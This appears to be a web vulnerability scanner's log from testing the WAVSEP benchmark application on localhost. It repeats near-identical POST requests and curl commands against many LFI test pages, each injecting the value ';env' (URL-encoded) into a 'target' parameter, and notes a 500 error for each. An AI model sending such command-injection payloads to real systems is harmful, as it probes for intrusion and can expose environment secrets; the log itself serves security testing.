POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case34-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case34-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case34-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case34-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case35-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case35-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case35-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case35-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case36-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case36-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case36-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case36-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case48-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case49-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Benv
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Benv"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
